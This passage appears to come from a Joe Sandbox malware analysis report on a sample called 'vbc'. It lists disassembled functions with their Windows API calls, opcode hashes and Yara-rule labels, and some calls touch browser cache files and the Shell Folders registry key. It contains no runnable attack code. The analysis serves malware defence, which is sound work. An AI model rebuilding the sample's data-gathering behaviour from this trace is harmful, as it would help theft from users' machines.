                                                                                                                                                                        Function 00408D9F Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
                                                                                                                                                                        • free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: 24817b5554e4738b88c440df0c7233c3037c59b36583c92020dd6282cd28d1d1
                                                                                                                                                                        • Instruction ID: aaa92272bc418c7d1270a62145ca905ed0b036dea6655797c2fa71225ad517e5
                                                                                                                                                                        • Opcode Fuzzy Hash: 24817b5554e4738b88c440df0c7233c3037c59b36583c92020dd6282cd28d1d1
                                                                                                                                                                        • Instruction Fuzzy Hash: D3D042B0404B008FE7B0DF39E401606BBF0AB483103208D2E90AAC2A50E775A1049F08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004109C4 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00410A52: memset.MSVCRT ref: 00410A9A
                                                                                                                                                                          • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB1
                                                                                                                                                                          • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB9
                                                                                                                                                                          • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B14
                                                                                                                                                                          • Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B22
                                                                                                                                                                          • Part of subcall function 004086BA: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00410A06,00000000,?,00000000,?,00000000), ref: 004086D2
                                                                                                                                                                          • Part of subcall function 004086BA: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004086E6
                                                                                                                                                                          • Part of subcall function 004086BA: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00411ED6), ref: 004086EF
                                                                                                                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00410A10
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4204647287-0
                                                                                                                                                                        • Opcode ID: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
                                                                                                                                                                        • Instruction ID: e327927a43c347593f183825775ae13c5bf460ea87da421573a566f28fb83fb7
                                                                                                                                                                        • Opcode Fuzzy Hash: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A117076C00218EBCF11EBA5DA419DEB7B9EF44300F10006BE441F3281EA749B84CB95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004057D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointerEx.KERNELBASE(004057A8,?,?,00000000,00000000,00000000,00405E25,00000000,00000000,?,00000000,004057A8), ref: 004057EE
                                                                                                                                                                          • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$PointerRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3154509469-0
                                                                                                                                                                        • Opcode ID: 64c5ed2aa36d8d537b285b5c1e7aa840f4d64fa0910f6d092a5b593a7cfce923
                                                                                                                                                                        • Instruction ID: 10cf5b1db118189887eacc4ff35e91e25d6bd08443c232d43c4ae27a9a01ea3e
                                                                                                                                                                        • Opcode Fuzzy Hash: 64c5ed2aa36d8d537b285b5c1e7aa840f4d64fa0910f6d092a5b593a7cfce923
                                                                                                                                                                        • Instruction Fuzzy Hash: FBE0C776100100FFE620AF08CC06F2BBBF8EFC4B00F10882EB2C49A0B5C6326812CB25
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413E1E Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 00413E45
                                                                                                                                                                          • Part of subcall function 00413CAE: memset.MSVCRT ref: 00413CCD
                                                                                                                                                                          • Part of subcall function 00413CAE: _itow.MSVCRT ref: 00413CE4
                                                                                                                                                                          • Part of subcall function 00413CAE: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00413CF3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4232544981-0
                                                                                                                                                                        • Opcode ID: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
                                                                                                                                                                        • Instruction ID: 5d66eace87880ca3e294b7f0e570a8e3be22b6ae62b10c3d44e19be24f2def2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
                                                                                                                                                                        • Instruction Fuzzy Hash: 89E0B632000249ABDF126F91EC01AAA7F66FF14315F148459FD6C14121D33295B0AF84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00444425 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNELBASE(?,?,00411BC7,?,?,00403557,?), ref: 00444436
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
                                                                                                                                                                        • Instruction ID: 39ddfc5443798b4b2f471bdaff8db486b4a9363c7739a8bb917076c50ef601e7
                                                                                                                                                                        • Opcode Fuzzy Hash: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
                                                                                                                                                                        • Instruction Fuzzy Hash: 92E0F6B5900B008F97308F2BE944506FBF8BEE46103108A1F91AAC2A21C3B4A5498F94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004135FF Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00413627: LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
                                                                                                                                                                          • Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676
                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004134F7,00000104,004134F7,00000000,?), ref: 0041361E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$FileLibraryLoadModuleName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3821362017-0
                                                                                                                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                        • Instruction ID: 7bbd5afd8370dadb00360ee8d7667c1b04e34d2617d736b2e99a938255987c13
                                                                                                                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7CD022312043007BD231EE708C00FCBB3E8BF44711F028C1AB190E2280C3B8C9409308
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413401 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,00406DBF,?,00000000,?,?,?,?,?,00000000,?), ref: 00413408
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
                                                                                                                                                                        • Instruction ID: 53121aa1ed69e67302caa1b874726051d72530908054280e128cb363a29a4499
                                                                                                                                                                        • Opcode Fuzzy Hash: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
                                                                                                                                                                        • Instruction Fuzzy Hash: 51D0C9324005229BDB00AF26EC45B857368EF00351B150025E800BB492D738BEA28ADC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040899C Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0040DDA6,00000000,0044AF64,00000002,?,0040FF40,00000000,00000000,?), ref: 004089B3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                                                        • Opcode ID: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
                                                                                                                                                                        • Instruction ID: 44b36b217b32540387e14a2368d622af177610148a3238ec1afc6282a592e5c5
                                                                                                                                                                        • Opcode Fuzzy Hash: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
                                                                                                                                                                        • Instruction Fuzzy Hash: 64D0C93551020DFFDF01CF80DD06FDE7B7DEB04359F104054BA0495060C7B59A10AB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407D7B Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
                                                                                                                                                                        • Instruction ID: 729bcb02508df23f9412a42fb8e8b3188fed1bd1f0cd2b7b0f8edc4fa6246a8f
                                                                                                                                                                        • Opcode Fuzzy Hash: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
                                                                                                                                                                        • Instruction Fuzzy Hash: E3C092B4240201BEFF228B10ED15F36295CD740700F2044247E00E80E0D1A04E108924
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407D94 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
                                                                                                                                                                        • Instruction ID: edb615435fe3ce855b8554d9524e6f242ae4b45eb81851bd3d2393cb7dc29c83
                                                                                                                                                                        • Opcode Fuzzy Hash: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
                                                                                                                                                                        • Instruction Fuzzy Hash: 67C012F43503017FFF208B10AD0AF37395DD780700F1084207F00E80E1D2E14C008924
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409552 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                                        • Opcode ID: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
                                                                                                                                                                        • Instruction ID: 664dc763c5da3aaab367392b47211da9bee634dc4adcd4213ebe75a48c3d30fa
                                                                                                                                                                        • Opcode Fuzzy Hash: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
                                                                                                                                                                        • Instruction Fuzzy Hash: 6EC09BB29127015BF7309F66C40471373D85F50767F314C5DA4D1964C1DB7CD5408514
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00414266 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,004141E0,00000000), ref: 00414275
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumNamesResource
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3334572018-0
                                                                                                                                                                        • Opcode ID: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
                                                                                                                                                                        • Instruction ID: 894f21907dab3ca3b917dc931ff3d8bd940b81db11264512214ff9c0d0df685d
                                                                                                                                                                        • Opcode Fuzzy Hash: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
                                                                                                                                                                        • Instruction Fuzzy Hash: 23C09B35654341A7C7029F109C0DF1E7EA5BB95705F504C29B151940A0C75251549609
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409428 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindClose.KERNELBASE(?,0040933E,?,00000000,?,004127ED,*.*,?), ref: 00409432
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                                        • Opcode ID: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
                                                                                                                                                                        • Instruction ID: 3bd61d94ea2d0ebbf22c21a92135ad1df5e9ea430364887b997a0a3dbe6c7a02
                                                                                                                                                                        • Opcode Fuzzy Hash: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
                                                                                                                                                                        • Instruction Fuzzy Hash: 3EC048345109018BD6289F38986A52A77A0AA5A3303A44F6CA0F2920E2E73888428A04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413ACB Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
                                                                                                                                                                        • Instruction ID: 95e4874612f61a4c2f5820174f699a9a2e50adc9900ffd5901b80c85968e45e3
                                                                                                                                                                        • Opcode Fuzzy Hash: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
                                                                                                                                                                        • Instruction Fuzzy Hash: 7BC04C35510B118BEF218B12C989793B3E4AF00757F40C818949685851D77CE454CE18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408250 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
                                                                                                                                                                        • Instruction ID: 7aa4b53cbdd50d27f0544b0d73f3b09e9b9e978b4a3a64aa4ec168f40bbc8e5c
                                                                                                                                                                        • Opcode Fuzzy Hash: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
                                                                                                                                                                        • Instruction Fuzzy Hash: 89B012B92104005BCF0807349C4904D36505F456317300B3CB033C01F0D730CCA0BA00
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413E4F Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
                                                                                                                                                                        • Instruction ID: 06f107d5783c69a41ddb44c60f44fa238db6365feab173ebf779541cd7ebc08f
                                                                                                                                                                        • Opcode Fuzzy Hash: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
                                                                                                                                                                        • Instruction Fuzzy Hash: E1C09B39544301BFDF114F40FE05F09BB61AB84F05F004414B344240B282714414EB57
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0041B76D Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: bc414d29a86c02bfab00fdf6615c28341d3535a26ade503b01f52aea8873ca66
                                                                                                                                                                        • Instruction ID: fa567e0f167378dcabf243c4c44df542d601d1aca3ea04bf4c0b19c361688719
                                                                                                                                                                        • Opcode Fuzzy Hash: bc414d29a86c02bfab00fdf6615c28341d3535a26ade503b01f52aea8873ca66
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A317C31901216EFDF14AF25D9817DA73A4FF00B55F14412BF825AB280DB38EDA08BD9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00405DEB Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                          • Part of subcall function 004057D2: SetFilePointerEx.KERNELBASE(004057A8,?,?,00000000,00000000,00000000,00405E25,00000000,00000000,?,00000000,004057A8), ref: 004057EE
                                                                                                                                                                        • memcpy.MSVCRT ref: 00405E6E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@FilePointermemcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 609303285-0
                                                                                                                                                                        • Opcode ID: 69c5ce9f8364cb3a2f3d9952414f58f868eb9a31ba510d0c6d062cd66918fe31
                                                                                                                                                                        • Instruction ID: b6d0ac0748dce8c6543b82d29fb895a5afc24863716f8b43ab814fbacadff293
                                                                                                                                                                        • Opcode Fuzzy Hash: 69c5ce9f8364cb3a2f3d9952414f58f868eb9a31ba510d0c6d062cd66918fe31
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F11B272500908BBD711A755C844F9F77ACEF84318F15807BF94573182C738AE068BE9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004060BC Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2081463915-0
                                                                                                                                                                        • Opcode ID: 5d18b3e2f7875cbfa1b7883ec22a938669b6fc3c83f0355837b3f79f1fd7a5de
                                                                                                                                                                        • Instruction ID: 08e2259bb844cdb7583518af71a3b249da553f2a004d57c4b783ea4beab812a3
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d18b3e2f7875cbfa1b7883ec22a938669b6fc3c83f0355837b3f79f1fd7a5de
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B118871600605AFDB10DF65C8C199AB7F8FF04314F11853EE416E7281EB34F9158B68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00405740 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004057C0: CloseHandle.KERNEL32(000000FF,00405750,00000000,?,00409A41,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409F26,?,0040A0FE,000000FF), ref: 004057C8
                                                                                                                                                                          • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
